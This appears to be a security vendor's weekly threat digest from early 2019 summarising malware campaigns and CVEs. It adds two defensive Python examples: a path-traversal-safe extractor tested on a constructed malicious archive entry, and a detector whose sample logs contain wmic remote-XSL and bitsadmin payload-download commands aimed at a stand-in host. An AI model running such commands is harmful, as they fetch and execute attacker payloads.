Threats of the Week – March 18, 2019

Ursnif banking Trojan

A new variant of an infamous banking Trojan with a history going back over ten years has emerged with new tactics that make it harder to detect. The malware hunts for financial information, usernames, passwords and other sensitive data.

The Ursnif banking Trojan is one of the most popular forms of information-stealing malware targeting Windows PCs, and it has existed in one form or another since at least 2007, when its code first emerged in the Gozi banking Trojan.

Now researchers at security company Cybereason have uncovered a new, previously undocumented version of Ursnif which applies different, stealthier infection tactics than other campaigns.

This includes what researchers refer to as “last minute persistence” – a means of installing the malicious payload which tries to ensure a lower chance of being uncovered.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Ursnif banking Trojan and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-7095

Adobe has released a security update for Adobe Digital Editions. This update resolves a critical vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user. Affected versions are 4.5.10.185749 and below.

Source: Adobe

How do you protect yourself?

Update Adobe Digital Editions to version 4.5.10.186048.

GlitchPOS Malware

A new insidious malware bent on siphoning credit-card numbers from point-of-sale (PoS) systems has recently been spotted on a crimeware forum.

Researchers at Cisco Talos said in a Wednesday analysis that they discovered the malware, dubbed “GlitchPOS,” being peddled on the Dark Web for $250. The malware first appeared on Feb. 2, and researchers said they don’t know yet how many cybercriminals bought it or are using it.

The malware is spread via email, purporting to be a game involving “various pictures of cats.”

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against GlitchPOS Malware and similar threats. Backing up your data and having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – March 11, 2019

StealthWorker Malware

Hackers are running a new campaign which drops the StealthWorker brute-force malware on Windows and Linux machines that end up being used to brute force other computers in a series of distributed brute force attacks.

As later discovered, the malware is capable of exploiting a number of vulnerabilities to infiltrate Magento, phpMyAdmin, and cPanel Content Management Systems (CMSs), as well as brute-forcing its way in if everything else fails.

While previously the StealthWorker payload was observed while being dropped on targeted servers with the help of the double-packed WallyShack Trojan downloader, the new campaign switched to a brute force-only approach aiming for any vulnerable host with weak or default credentials.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against StealthWorker malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-7816

Adobe has released security updates for ColdFusion versions 2018, 2016 and 11. These updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.

Adobe is aware of a report that CVE-2019-7816 has been exploited in the wild.

Source: Adobe

How do you protect yourself?

Adobe recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.

CryptoMix Ransomware

A new CryptoMix Ransomware variant has been discovered that appends the .CLOP or .CIOP extension to encrypted files. Of particular interest is that this variant now indicates that the attackers are targeting entire networks rather than individual computers.

This variant is currently being distributed using executables that have been code-signed with a digital signature. Doing so makes the executable appear more legitimate and may help to bypass security software detections.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against CryptoMix Ransomware and similar threats. Backing up your data and having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – March 4, 2019

Farseer Malware

A new brand of malware has been developed to give a threat group the tools required to attack Windows operating systems alongside their usual Android targets.

On Tuesday, cybersecurity researchers from Palo Alto’s Unit 42 said the malware, dubbed Farseer, has connections to HenBox, a cyberespionage malware detected in 2018 in attacks against Google’s Android operating system.

HenBox primarily targets the Turkish Uyghur group in order to steal personal and device information, including any phone numbers with a Chinese prefix. The malware is also able to compromise smartphone cameras and microphones.

Generally focused on smartphones, the hackers have now expanded their horizons with the launch of Farseer. The malware is spread through phishing campaigns and malicious .PDF files which employ social engineering tactics through the copy-and-paste of news articles sourced through a Myanmar website.

Source: ZDNet

How do you protect yourself?

Proper security measures must be in place to defend against Farseer malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2018-20250

A critical 19-year-old WinRAR vulnerability disclosed last week has now been spotted actively being exploited in a spam campaign spreading malware.

The campaign, discovered by researchers with 360 Threat Intelligence Center, takes advantage of a path-traversal WinRAR vulnerability, which could allow bad actors to remotely execute malicious code on victims’ machines simply by persuading them to open a file.

Source: ThreatPost

How do you protect yourself?

Researchers urge WinRAR users to update as soon as possible to the newest version of the software, 5.70 beta 1.
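The vulnerability described above is a path-traversal bug in an archive extractor: an entry name containing “..” components makes the extractor write the file outside the folder the user chose, which is how "simply opening a file" becomes code execution. The Python below is an added example written for this page, not code from WinRAR, 360 Threat Intelligence Center or ThreatPost. It uses the zip format (because the standard library can build and read it) rather than the archive format affected in WinRAR, and the archive it extracts is constructed inline. It shows the check a safe extractor performs: resolve each entry name against the destination directory and refuse anything that would land outside it.

```python
import io
import os
import tempfile
import zipfile


def is_safe_member(name: str, dest_dir: str) -> bool:
    """Return True only if archive entry `name` resolves to a path inside dest_dir.

    The comparison is made on fully resolved paths, so "..", repeated separators
    and symlinked directories are all accounted for.
    """
    # Absolute paths and Windows drive-letter paths can never be inside dest_dir.
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        return False
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, name))
    try:
        return os.path.commonpath([dest, target]) == dest
    except ValueError:
        # Paths on different drives (Windows) share no common prefix: unsafe.
        return False


def safe_extract(zip_bytes: bytes, dest_dir: str) -> tuple[list[str], list[str]]:
    """Extract only the members that stay inside dest_dir.

    Returns (extracted, rejected) entry names. Python's zipfile already strips
    ".." and leading separators on extraction; the explicit check is kept so the
    decision to reject is visible and can be logged instead of silently rewritten.
    """
    extracted: list[str] = []
    rejected: list[str] = []
    os.makedirs(dest_dir, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest_dir):
                rejected.append(info.filename)
                continue
            zf.extract(info, dest_dir)
            extracted.append(info.filename)
    return extracted, rejected


def build_sample_archive() -> bytes:
    """Constructed sample archive: one benign entry and one traversal attempt."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "benign content\n")
        zf.writestr("../../escaped.txt", "must never be written outside the target\n")
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Extract the constructed archive into a scratch directory and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(build_sample_archive(), os.path.join(tmp, "out"))


if __name__ == "__main__":
    extracted, rejected = demo()
    print("extracted:", extracted)
    print("rejected: ", rejected)
```

Running the script writes only readme.txt into the scratch directory and reports the traversal entry as rejected. The same resolve-then-compare check applies to any format whose entries carry their own file names (tar, 7z, ACE, RAR).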

 

B0r0nt0K Ransomware

A new ransomware called B0r0nt0K is encrypting victims’ web sites and demanding a ransom of 20 bitcoin, or approximately $75,000. This ransomware is known to infect Linux servers, but may also be able to encrypt systems running Windows.

In a BleepingComputer forum post, a user stated that a client’s web site was encrypted with the new B0r0nt0K Ransomware. The encrypted web site was running on Ubuntu 16.04 and had all of its files encrypted and renamed, with the .rontok extension appended to them.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against B0r0nt0K Ransomware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – February 25, 2019

Rietspoof Malware

Rietspoof is a new malware family which uses a multi-stage delivery system, is designed to drop multiple payloads on the systems it infects, and offers very little to no information on what audience it targets.

What’s known at the moment is that the malware uses multiple stages to compromise its targets, each of them having very particular capabilities, with one acting as a bot that “can download/upload files, start processes, or initiate a self-destruct function,” and another behaving like a run-of-the-mill downloader.

At this moment, Rietspoof’s end goal, targets, and exact infection chain are not yet known, but one thing is obvious: the threat actors behind this malware are accelerating its development and deployment, adding new features and updating or improving the existing ones each day.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Rietspoof malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-7815

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address a reported bypass to the fix for CVE-2019-7089 first introduced in 2019.010.20091, 2017.011.30120 and 2015.006.30475 and released on February 12, 2019. Successful exploitation could lead to sensitive information disclosure in the context of the current user.

Affected Versions

Product              Track          Affected Versions                      Platform
Acrobat DC           Continuous     2019.010.20091 and earlier versions    Windows and macOS
Acrobat Reader DC    Continuous     2019.010.20091 and earlier versions    Windows and macOS
Acrobat 2017         Classic 2017   2017.011.30120 and earlier versions    Windows
Acrobat Reader 2017  Classic 2017   2017.011.30120 and earlier versions    Windows
Acrobat DC           Classic 2015   2015.006.30475 and earlier versions    Windows
Acrobat Reader DC    Classic 2015   2015.006.30475 and earlier versions    Windows

Source: Adobe

How do you protect yourself?

Upgrade Adobe Acrobat and Reader to the latest version.

WinPot Malware

The WinPot ATM jackpotting malware is evolving as its authors look to solve the obstacles that get in their way. The latest change is an effort to help ATM hackers, a.k.a. jackpotters, better target their efforts in order to steal more cash in less time.

Thieves infect ATMs through physical access, i.e., by using USB drives to install malware onto the machine (ATM owners can thus protect themselves through device control and software blacklisting/whitelisting). The USB port is located on the back of the ATM, which the criminals get to by popping open a flange on the front that exposes a hole.

Once the malware is installed, the cybercriminals can force the ATM to dispense cash on-demand via a software interface that appears on the ATM’s screen. The effect is a bit like hitting the jackpot on a slot machine, hence the nickname for this kind of strike.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against WinPot Malware and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.

Threats of the Week – February 19, 2019

Clipper Malware

A malicious app designed to steal cryptocurrency from victims by replacing a wallet address in the phone’s clipboard has been discovered on Google Play, the official Android app store; it is the first “clipper” malware found there.

Usually cryptocurrency-stealers are found on unsanctioned Android app stores, but researchers with ESET on Friday said that they spotted the malicious app (a fake version of the legitimate MetaMask service) shortly after it had been introduced at the official Android store on Feb. 1. The app has since been removed, but anyone who had already downloaded it remains affected.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against Clipper malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-7090

Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one important vulnerability in Adobe Flash Player. Successful exploitation could lead to information disclosure in the context of the current user.

Source: Adobe

How do you protect yourself?

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the latest version:

Product                                                         Version      Platform                               Priority   Availability
Adobe Flash Player Desktop Runtime                              32.0.0.142   Windows, macOS                         2          Flash Player Download Center; Flash Player Distribution
Adobe Flash Player for Google Chrome                            32.0.0.142   Windows, macOS, Linux, and Chrome OS   2          Google Chrome Releases
Adobe Flash Player for Microsoft Edge and Internet Explorer 11  32.0.0.144   Windows 10 and 8.1                     2          Microsoft Security Advisory
Adobe Flash Player Desktop Runtime                              32.0.0.142   Linux                                  3          Flash Player Download Center

Astaroth Trojan

A new Astaroth Trojan campaign targeting Brazil and European countries is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and load malicious modules.

According to Cybereason’s Nocturnus team which discovered the new Astaroth strain, just like previous installments, the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” but it also makes use “of well-known tools and even antivirus software to expand its capabilities.”

This Astaroth variant is distributed through spam campaigns just like previous versions, and the infection starts with a .7zip archive delivered to the target in the form of an e-mail message attachment or hyperlink. The malicious archive contains a .lnk file which will spawn a wmic.exe process that will “initialize an XSL Script Processing attack.”

Next, the malware connects to a command-and-control (C2) server and exfiltrates information about the infected computer. After downloading the encrypted XSL script to the infected machine, the Trojan will use BITSAdmin to grab a payload from another C2 server, carefully obfuscated as images or files without extensions containing various Astaroth modules.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Astaroth Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.
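The two behaviours quoted above, wmic.exe invoked to process an XSL script and BITSAdmin fetching a payload from a C2 server, both leave traces in process-creation telemetry. The Python below is an added example written for this page, not code from Cybereason or BleepingComputer. It runs two simple rules over constructed sample log lines; the log layout and the example.invalid host names are made up for illustration, while the wmic /format: and bitsadmin /transfer switches are the real command-line options those tools accept. The same pattern works over Sysmon or EDR process events once the parser is swapped for one matching that schema.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample process-creation events in a simple "parent -> child : command line"
# layout. The layout is an assumption for this example, not a real product's log schema.
SAMPLE_EVENTS = [
    'explorer.exe -> wmic.exe : wmic.exe os get /format:"https://example.invalid/payload.xsl"',
    'cmd.exe -> bitsadmin.exe : bitsadmin /transfer job1 https://example.invalid/img.jpg C:\\Users\\Public\\img.jpg',
    'explorer.exe -> wmic.exe : wmic.exe process list brief',
    'svchost.exe -> bitsadmin.exe : bitsadmin /list',
    'explorer.exe -> notepad.exe : notepad.exe notes.txt',
]


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    child: str
    command_line: str


# Each rule is (name, pattern over the command line).
# wmic's /format: switch pointing at a remote or local .xsl file is the documented
# XSL Script Processing vector; bitsadmin's /transfer switch with a URL is how
# BITSAdmin downloads a payload.
RULES = [
    ("wmic_xsl_format",
     re.compile(r'\bwmic(?:\.exe)?\b.*?/format:\s*"?(?:https?://|\\\\|[^\s"]+\.xsl)', re.I)),
    ("bitsadmin_transfer",
     re.compile(r'\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?https?://', re.I)),
]

EVENT_RE = re.compile(r'^(?P<parent>\S+) -> (?P<child>\S+) : (?P<cmd>.*)$')


def parse_event(line: str) -> Optional[tuple[str, str, str]]:
    """Split one constructed log line into (parent, child, command line)."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return m.group("parent"), m.group("child"), m.group("cmd")


def scan(events: list[str]) -> list[Finding]:
    """Run every rule over every event.

    Both tools have legitimate administrative uses, so findings are triage leads
    to be reviewed alongside the parent process and the destination host, not verdicts.
    """
    findings: list[Finding] = []
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue
        parent, child, cmd = parsed
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, parent, child, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.parent} -> {f.child}: {f.command_line}")
```

On the constructed events the scan flags only the wmic.exe line carrying a remote XSL and the bitsadmin line downloading from a URL; the ordinary wmic and bitsadmin invocations pass.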

Threats of the Week – February 11, 2019

Qakbot Malware

Cofense observed the Geodo botnets delivering non-Geodo malware since at least Jan. 28 via increasingly targeted phishing efforts. The attack begins when a user receives a phishing email containing a weaponized Microsoft Office document. That file contains malicious embedded macros that, when enabled, directly deliver Qakbot malware to the victim’s device. Researchers also witnessed the campaign leveraging IcedID, another banking Trojan, as its final payload.

In both cases, the campaign ends by replacing the binary content with that of calc.exe. This tactic is designed to help the campaign hide in plain sight, which signals Geodo’s evolution as a digital threat. Cofense found additional evidence of this evolution in Geodo’s use of targeted addressing, internal signatures and previous threads to prey on state-level government departments in the U.S. as part of a related malware campaign.

Source: Security Intelligence

How do you protect yourself?

Proper security measures must be in place to defend against Qakbot malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

CVE-2019-1986

Google has released a security bulletin detailing several patched vulnerabilities. The most severe of these issues is a critical security vulnerability in Framework that could allow a remote attacker using a specially crafted PNG file to execute arbitrary code within the context of a privileged process.

Source: Android

How do you protect yourself?

Update your Android OS to the latest version.

SpeakUp Backdoor Trojan

A malware campaign distributing a new Backdoor Trojan named SpeakUp is currently targeting servers running six different Linux distributions and macOS by exploiting a number of known security vulnerabilities, while also managing to evade all anti-malware solutions in the process.

Backdoor Trojans are malware that give attackers access to compromised machines and let them control those infected computers using commands sent via command-and-control (C&C) servers.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against SpeakUp Backdoor Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.